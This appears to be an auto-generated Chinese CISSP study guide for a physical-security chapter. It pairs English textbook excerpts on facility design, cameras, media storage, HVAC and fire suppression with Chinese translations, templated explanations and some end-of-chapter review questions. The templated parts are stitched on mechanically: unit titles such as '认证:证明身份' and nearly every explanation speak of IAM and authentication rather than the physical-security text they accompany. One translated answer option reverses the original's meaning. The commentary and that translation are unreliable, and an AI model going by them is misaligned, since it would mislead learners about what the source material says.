读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 52 / PDF P707

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

monitoring; heating, ventilation, and air-conditioning (HVAC) power supplies; and fire detection and suppression. Physical controls for physical security include fencing, lighting, locks, construction materials, a person trap, guard dogs, and security guards. Wiring closets and server rooms are important infrastructure elements that require protection. They often house core networking devices and other sensitive equipment. Protections include adequate locks, smartcards for authentication, proximity devices and readers intrusion detection systems, cameras, surveillance, access control, and regular physical inspections.

An important aspect of physical access control and maintaining a facility's security is protecting the environment's basic elements; this may include the use of media storage facilities, evidence storage, and work area restrictions. Providing clean power sources, minimizing interference, and managing the environment are also important. Fire detection and suppression must not be overlooked. In addition to protecting people, fire detection and suppression are designed to keep damage caused by fire, smoke, heat, and suppression materials to a minimum, especially regarding the IT infrastructure.

Additional physical security mechanisms to implement and manage include perimeter breach detection, fences, gates, turnstiles, person traps, lighting, security guards, guard dogs, locks, badges, protected cable distribution, motion detectors, intrusion alarms, and secondary verification mechanisms. It is also essential to evaluate regulatory compliance and track KPIs. Study Essentials Understand why there is no security without physical security. Without control over the physical environment, no amount of administrative or technical/logical access controls can provide adequate security.

If a malicious person can gain physical access to your facility or equipment, they can do just about anything they want, from destruction to disclosure and alteration. Understand a security facility plan. A secure facility plan outlines your organization's security needs and emphasizes methods or mechanisms to provide security. Such a plan is developed through risk assessment and critical path analysis.

中文直译 / 整理

监控; 供暖、通风和空调(HVAC)电源; 以及火灾检测与抑制。 物理安全的 物理控制包括围栏、照明、锁具、建筑材料、人员陷阱、警犬和安保人员。 配线间和服务器机房是需要保护的重要基础设施元素,通常存放核心网络设 备和其他敏感设备。 防护措施包括适当的锁具、用于身份验证的智能卡、近 距感应设备和读卡器、入侵检测系统、摄像头、监控、访问控制以及定期的 物理检查。 物理访问控制和维护设施安全的一个重要方面是保护环境的基本要素; 这可能 包括使用介质存储设施、证据存储和工作区域限制。 提供洁净的电源、最小化 干扰以及管理环境同样重要。 火灾检测与扑灭措施不可忽视。 除了保护人员安全外,火灾检测与扑灭 旨在将火灾、烟雾、热量及扑灭材料造成的损害降至最低,特别是针对 IT基础设施。 需要实施和管理的其他物理安全机制包括周界入侵检测、围栏、门禁、旋转门、 人员陷阱、照明、保安人员、警犬、锁具、徽章、受保护的电缆布线、运动探 测器、入侵报警器和二次验证机制。 同时,评估合规性并跟踪关键绩效指标 (KPI)也至关重要。 学习必备 理解为何没有物理安全就不存在安全。

如果没有对物理环境的控制,无论多么 完善的管理或技术/逻辑访问控制都无法提供足够的安全保护。 如果恶意人员能 够获得对您设施或设备的物理访问权限,他们几乎可以为所欲为,从破坏到泄 露和篡改。 理解安全设施计划。 安全设施计划概述了您的组织的安全需求,并强调提供安 全性的方法或机制。 此类计划是通过风险评估和关键路径分析制定的。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 53 / PDF P708

第 708 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Know about technology convergence. Technology convergence is the tendency for various technologies, solutions, utilities, and systems to evolve and merge over time. Though this can result in improved efficiency and cost savings in some instances, it can also represent a single point of failure and become a more valuable target for malicious actors and intruders. Understand site selection. Site selection should be based on the security needs of the organization. Cost, location, and size are important, but addressing the requirements of security should always take precedence. The key elements in selecting a site are visibility, composition of the surrounding area, and accessibility.

Know the key elements in designing a facility for construction. A key element in designing a facility for construction is understanding the level of security needed by your organization and planning for it before construction begins. Know the functional order of controls. These are deter, deny, detect, delay, determine, and decide. Understand equipment failure. No matter the quality of the equipment your organization chooses to purchase and install, eventually, it will fail. Preparing for equipment failure may include purchasing replacement parts, storing equipment, or having an SLA with a vendor. Know how to design and configure secure work areas.

There should not be equal access to all locations within a facility. Areas that contain assets of higher value or importance should have restricted access. Valuable and confidential assets should be located in the heart or center of protection provided by a facility. Understand the security concerns of a wiring closet. A wiring closet is where the networking cables for a whole building or just a floor are connected to other essential equipment, such as patch panels, switches, routers, LAN extenders, and backbone channels. Most of the wiring closet security focuses on preventing unauthorized access.

If an unauthorized intruder gains access to the area, they may be able to steal equipment, pull or cut cables, or even plant a listening device. Know about proximity devices and readers. A proximity device can be a passive device, a field-powered device, or a transponder. When it passes near a proximity reader, the reader device is able to determine who the bearer is and whether they have authorized access.

中文直译 / 整理

了解技术融合。 技术融合是指各种技术、解决方案、公用设施和系统随着时间 推移而演变并合并的趋势。 尽管在某些情况下这可以提高效率并节省成本,但 它也可能成为单点故障,并成为恶意行为者和入侵者更具价值的目标。 了解选址。 选址应基于组织的安全需求。 成本、位置和规模固然重要,但满足安 全要求应始终优先考虑。 选址的关键要素包括可见性、周边环境构成和可达性。 了解设施建造设计的关键要素。 设计建造设施的关键要素是了解组织所需的安 全级别,并在施工开始前做好相应规划。 了解控制措施的功能顺序。 这些顺序为威慑、阻止、检测、延迟、确定和决策。 了解设备故障。 无论组织选择购买和安装的设备质量如何,最终都会发生故障。 应对设备故障的准备措施可能包括购买备件、储存设备或与供应商签订服务等级 协议(SLA)。 了解如何设计和配置安全的工作区域。 设施内的所有区域不应具有同等访问权限。 包含更高价值或重要资产的区域应限制访问。 贵重和机密资产应位于设施所提供 的保护核心或中心位置。 了解配线间的安全隐患。 配线间是将整栋建筑或单层楼的网络电缆连接到其他 关键设备(如配线架、交换机、路由器、局域网扩展器和主干通道)的地方。

配 线间安全的主要重点是防止未经授权的访问。 如果未经授权的入侵者进入该区域, 他们可能窃取设备、拉扯或切断电缆,甚至安装窃听装置。 了解近距设备和读卡器。 近距设备可以是无源设备、场供电设备或应答器。 当它 靠近近距读卡器时,读卡器能够识别持有者的身份以及其是否具有授权访问权限。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 708 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 54 / PDF P709

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Understand intrusion detection systems. Intrusion detection systems (IDSs) or burglar alarms are automated or manual systems designed to detect an attempted intrusion, breach, or attack; the use of an unauthorized entry point; or the occurrence of some specific event at an unauthorized or abnormal time. Know about cameras. Video surveillance, video monitoring, closedcircuit television (CCTV), and security cameras are all means to deter unwanted activity and create a digital record of the occurrence of events.

Cameras can be overt or hidden; can record locally or to a cloud storage service; may offer pan, tilt, and zoom; may operate in visible or infrared light; may be triggered by movement; and may support time-lapse recording, tracking, facial recognition, gait analysis, object detection, or infrared or color-filtered recording. Understand security needs for media storage. Media storage facilities should be designed to store blank media, reusable media, and installation media securely. The concerns include theft, corruption, and data remnant recovery.

Media storage facility protections include using locked cabinets or safes, using a media librarian/custodian, implementing a check-in/checkout process, and using media sanitization. Understand the concerns of evidence storage. Evidence storage is used to retain logs, drive images, virtual machine snapshots, and other datasets for recovery, internal investigations, and forensic investigations. Protections include dedicated/isolated storage facilities, offline storage, activity tracking, hash management, access restrictions, and encryption. Know the common threats to physical access controls.

No matter what form of physical access control is used, a security guard or other monitoring system must be deployed to prevent abuse, impersonation, masquerading, tailgating, and piggybacking. Understand how to control your environment. In addition to power considerations, maintaining the environment involves control over the HVAC mechanisms. Rooms containing primarily computers should be kept at 59 to 89.6 degrees Fahrenheit (15 to 32 degrees Celsius). Humidity in a computer room should be maintained between 20 and 80 percent. Too much humidity can cause corrosion. Too little humidity causes static electricity. Understand the need to manage water leakage and flooding.

Your environmental safety policy and procedures should address water leakage and flooding. Water and electricity don't mix. Locate server rooms and critical

中文直译 / 整理

了解入侵检测系统。 入侵检测系统(IDS)或防盗报警系统是设计用于检测试图 入侵、突破或攻击; 使用未经授权的入口点; 或在未经授权或异常时间发生特定 事件的自动化或手动系统。 了解摄像头。 视频监控、视频监视、闭路电视(CCTV)和安全摄像头都是用于 阻止不良行为并创建事件发生数字记录的手段。 摄像头可以是显性的或隐蔽的; 可以本地录制或上传至云存储服务; 可能支持全景、俯仰和变焦; 可在可见光或 红外光下运行; 可能由运动触发; 并可能支持延时录制、追踪、人脸识别、步态 分析、物体检测或红外或彩色滤波录制。 了解媒体存储的安全需求。 媒体存储设施应设计用于安全存储空白媒体、可重复 使用媒体和安装媒体。 关注点包括盗窃、损坏和数据残留恢复。 媒体存储设施的 保护措施包括使用上锁的柜子或保险箱、指定媒体管理员/保管人、实施借入/归 还流程,以及使用媒体清理技术。 了解证据存储的注意事项。 证据存储用于保留日志、磁盘镜像、虚拟机快照 和其他数据集,以供恢复、内部调查和法证调查使用。 保护措施包括专用/隔 离的存储设施、离线存储、活动追踪、哈希管理、访问限制和加密。 了解物理访问控制的常见威胁。

无论使用何种形式的物理访问控制,都必须 部署安全人员或其他监控系统,以防止滥用、冒名顶替、伪装、尾随和搭便车 行为。 了解如何控制您的环境。 除了电源考虑外,环境维护还包括对暖通空调( HVAC)系统的控制。 主要包含计算机的房间应保持在59至89.6华氏度(15至 32摄氏度)之间。 计算机房的湿度应维持在20%至80%之间。 湿度过高会导致腐 蚀,湿度过低则会产生静电。 理解管理漏水和洪水的必要性。 您的环境安全政策和程序应涵盖漏水和洪水问题。 水和电不能混合。 请尽可能将服务器机房和关键

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 55 / PDF P710

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

computer equipment away from any water source or transport pipes whenever possible. Understand the importance of fire detection and suppression. Protecting personnel from harm should always be the most important goal of any security or protection system. In addition to protecting people, fire detection and suppression are designed to keep damage caused by fire, smoke, heat, and suppression materials to a minimum, especially in regard to the IT infrastructure. Know about physical perimeter security controls. Controlled access to a facility can be accomplished using fences, gates, turnstiles, person traps, bollards, and barricades. Know about security guards and guard dogs.

Guards can be posted around a perimeter or inside to monitor access points or watch detection and surveillance monitors. Guards are able to adapt and react to various conditions or situations and can learn and recognize attack and intrusion activities and patterns, adjust to a changing environment, and make decisions and judgment calls. An alternative to security guards, guard dogs can often be deployed as a perimeter security control and are an extremely effective detection and deterrent. Understand how to handle visitors in a secure facility. If a facility employs restricted areas to control physical security, then a mechanism to handle visitors is required.

Often an escort is assigned to visitors, and their access and activities are monitored closely. Failing to track outsiders' actions when granted access to a protected area can result in malicious activity against the most protected assets. Understand internal security controls. There are many physical security mechanisms for internal control, including locks, badges, protective distribution systems (PDSs), motion detectors, intrusion alarms, and secondary verification mechanisms. Know about KPIs of physical security. Physical security's key performance indicators (KPIs) should be determined, monitored, recorded, and evaluated.

KPIs are metrics or measurements of the operation or failure of various aspects of physical security. Written Lab

中文直译 / 整理

计算机设备远离任何水源或输送管道。 了解火灾探测与扑灭的重要性。 保护人员免受伤害应始终是任何安全或防护系 统的首要目标。 除了保护人员外,火灾探测与扑灭系统还旨在将火灾、烟雾、 热量和扑灭材料造成的损害降至最低,尤其是在IT基础设施方面。 了解物理周界安全控制措施。 可通过围栏、门、旋转门、人员陷阱、路桩和路 障等方式实现对设施的受控访问。 了解保安人员和警犬。 保安人员可部署在周界周围或内部,以监控出入口或监视 探测与监控设备。 保安人员能够适应并应对各种状况或情境,学习并识别攻击和 入侵活动与模式,适应变化的环境,并做出判断与决策。 作为保安人员的替代方 案,警犬常被用作周界安全控制手段,是一种极为有效的探测与威慑手段。 了解如何在安全设施中管理访客。 如果设施设有受限区域以控制物理安全,则 需要建立访客管理机制。 通常会为访客指派陪同人员,并密切监控其访问权限 与活动。 若未对获准进入受保护区域的外部人员进行跟踪,可能导致针对最敏 感资产的恶意行为。 理解内部安全控制。 内部控制有许多物理安全机制,包括锁、徽章、防护分配 系统(PDS)、运动探测器、入侵警报和二次验证机制。 了解物理安全的KPI。

物理安全的关键绩效指标(KPI)应被确定、监控、记 录和评估。 KPI是衡量物理安全各个方面运行或故障情况的指标或度量。 书面实验

小白解释

场景先行:你是公司的安全负责人,正在读第 710 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 56 / PDF P711

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

1. What kind of device helps to define an organization's perimeter and also serves to deter casual trespassing? 2. What is the problem with halon-based fire suppression technology? 3. What kinds of potential issues can an emergency visit from the fire department leave in its wake? 4. What are the three main types of proximity devices and how do they work? Review Questions 1. Your organization plans on building a new facility to house most on-site workers. The current facility has had numerous security issues, such as loitering, theft, graffiti, and even a few physical altercations between employees and nonemployees.

The CEO has asked you to assist in developing the facility plan to reduce these security concerns. While researching options, you discover the concepts of first generation CPTED. Which of the following is not one of its core strategies? A. Territorial control B. Access control C. Natural training and enrichment D. Natural surveillance 2. What method is a systematic effort to identify relationships between mission-critical applications, processes, and operations and all the necessary supporting elements when evaluating the security of a facility or designing a new facility? A. Log file audit B. Critical path analysis C. Risk analysis D. Taking inventory 3.

Which of the following is a true statement in regard to security cameras? (Choose all that apply.) A. Cameras should be positioned to watch exit and entry points. 1.

中文直译 / 整理

哪种设备有助于定义组织的边界,同时还能阻止随意侵入? 2. 卤代烷灭火技术存在什么问题? 3. 消防部门的紧急访问可能留下哪些潜在问题? 4. 三种主要的接近式设备是什么,它们是如何工作的? 复习题 1. 贵组织计划建造一个新设施,用于容纳大多数现场员工。 当前设施已发 生过诸多安全问题,例如闲逛、盗窃、涂鸦,甚至员工与非员工之间发生过 几起肢体冲突。 首席执行官要求您协助制定设施规划,以减少这些安全问题。 在研究选项时,您发现了第一代CPTED概念。 以下哪一项不是其核心策略? A. 领土控制 B. 访问控制 C. 自然训练与丰富化 D. 自然监视 2. 在评估设施安全或设计新设施时,哪种方法是系统性地识别关键任务应 用程序、流程和操作与所有必要支持要素之间关系的方法? A. 日志文件审计 B. 关键路径分析 C. 风险分析 D. 盘点库存 3. 以下关于安全摄像头的陈述中,哪些是正确的? (选择所有适用项。 ) A. 摄像头应安装在监控出口和入口的位置。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

审计题关注独立性、证据、范围和报告。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 57 / PDF P712

第 712 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

B. Cameras are not needed around valuable assets and resources or to provide additional protection in public areas such as parking structures and walkways. C. Cameras should be positioned to have clear sight lines of all exterior walls, entrance and exit points, and interior hallways. D. Security cameras should only be overt and obvious to provide a deterrent benefit. E. Security cameras have a fixed area of view for recording. F. Some camera systems include a system on a chip (SoC) or embedded components and may be able to perform various specialty functions, such as time-lapse recording, tracking, facial recognition, object detection, or infrared or color-filtered recording. G.

Motion detection or sensing cameras can always distinguish between humans and animals. 4. Your organization is planning on building a new primary headquarters in a new town. You have been asked to contribute to the design process and given copies of the proposed blueprints to review. Which of the following is not a security-focused facility or site design element? A. Separation of work and visitor areas B. Restricted access to areas with higher value or importance C. Confidential assets located in the heart or center of a facility D. Equal access to all locations within a facility 5. A recent security audit of your organization's facilities has revealed a few items that need to be addressed.

A few of them are related to your main data center. But you think at least one of the findings is a false positive. Which of the following does not need to be true to maintain the most efficient and secure server room? A. It must be optimized for workers. B. It must include the use of nonwater fire suppressants. C. The humidity must be kept between 20 and 80 percent. D. The temperature must be kept between 59 and 89.6 degrees Fahrenheit. B.

中文直译 / 整理

在贵重资产和资源周围,或在停车场和人行道等公共区域,无需安 装摄像头以提供额外保护。 C. 摄像头应安装在能清晰拍摄所有外墙、出入口以及内部走廊的位置。 D. 安全摄像头应仅设置为显眼且明显,以起到威慑作用。 E. 安全摄像头的拍摄范围是固定的。 F. 一些摄像头系统包含片上系统(SoC)或嵌入式组件,能够执行各种 特殊功能,例如延时录制、跟踪、人脸识别、物体检测或红外/彩色滤光 录制。 G. 运动检测或感应摄像头并非总能区分人类与动物。 4. 您的组织计划在一座新城镇建造一个新的主要总部。 您被要求参与设计过 程,并收到了拟议的蓝图以供审查。 以下哪一项是不属于以安全为重点的设 施或场地设计元素? A. 工作区与访客区的分离 B. 限制对高价值或重要区域的访问 C. 机密资产位于设施的核心或中心位置 D. 对设施内所有位置的访问权限均等 5. 对您组织设施的最新安全审计发现了一些需要解决的问题。 其中一些与您 的主数据中心有关。 但您认为至少有一项发现是误报。 以下哪一项是不需要 满足的,以维持最高效和安全的服务器机房? A. 它必须为工作人员优化。 B. 必须使用非水灭火剂。 C. 湿度必须保持在20%至80%之间。

D. 温度必须保持在59至89.6华氏度之间。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 712 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 58 / PDF P713

第 713 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

6. A recent security policy update has restricted the use of portable storage devices when they are brought in from outside. As compensation, a media storage management process has been implemented. Which of the following is not a typical security measure implemented in relation to a media storage facility containing reusable, removable media? A. Employing a media librarian or custodian B. Using a check-in/checkout process C. Hashing D. Using sanitization tools on returned media 7. The company's server room has been updated with raised floors and MFA door locks. You want to ensure that updated facility is able to maintain optimal operational efficiency.

What is the ideal humidity range for a server room? A. 20–40 percent B. 20–80 percent C. 80–89.6 percent D. 70–95 percent 8. You are mapping out the critical paths of network cables throughout the building. Which of the following items do you need to make sure to include and label on your master cabling map as part of crafting the cable plant management policy? (Choose all that apply.) A. Person trap B. Entrance facility C. Equipment room D. Fire escapes E. Backbone distribution system F. Telecommunications room G. UPSs H. Horizontal distribution system I. Loading dock 6.

中文直译 / 整理

最近的安全策略更新限制了从外部带入的便携式存储设备的使用。 作为补 偿,已实施媒体存储管理流程。 以下哪项是与包含可重复使用可移动媒体的 媒体存储设施相关的不典型安全措施? A. 雇用媒体图书管理员或保管员 B. 使用签入/签出流程 C. 哈希 D. 对返回的媒体使用清理工具 7. 公司的服务器机房已更新为架空地板和多因素身份验证门锁。 您希望确保 更新后的设施能够维持最佳运行效率。 服务器机房的理想湿度范围是多少? A. 20–40% B. 20–80% C. 80–89.6% D. 70–95% 8. 您正在绘制整个建筑中网络电缆的关键路径。 在制定电缆布线管理策略时, 您需要确保在主电缆图上包含并标注以下哪些项目? (选择所有适用项。 ) A. 人员陷阱 B. 入口设施 C. 设备间 D. 火灾逃生通道 E. 主干分布系统 F. 电信间 G. 不间断电 源(UPS) H. 水平分布系统 I. 装卸货平台

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

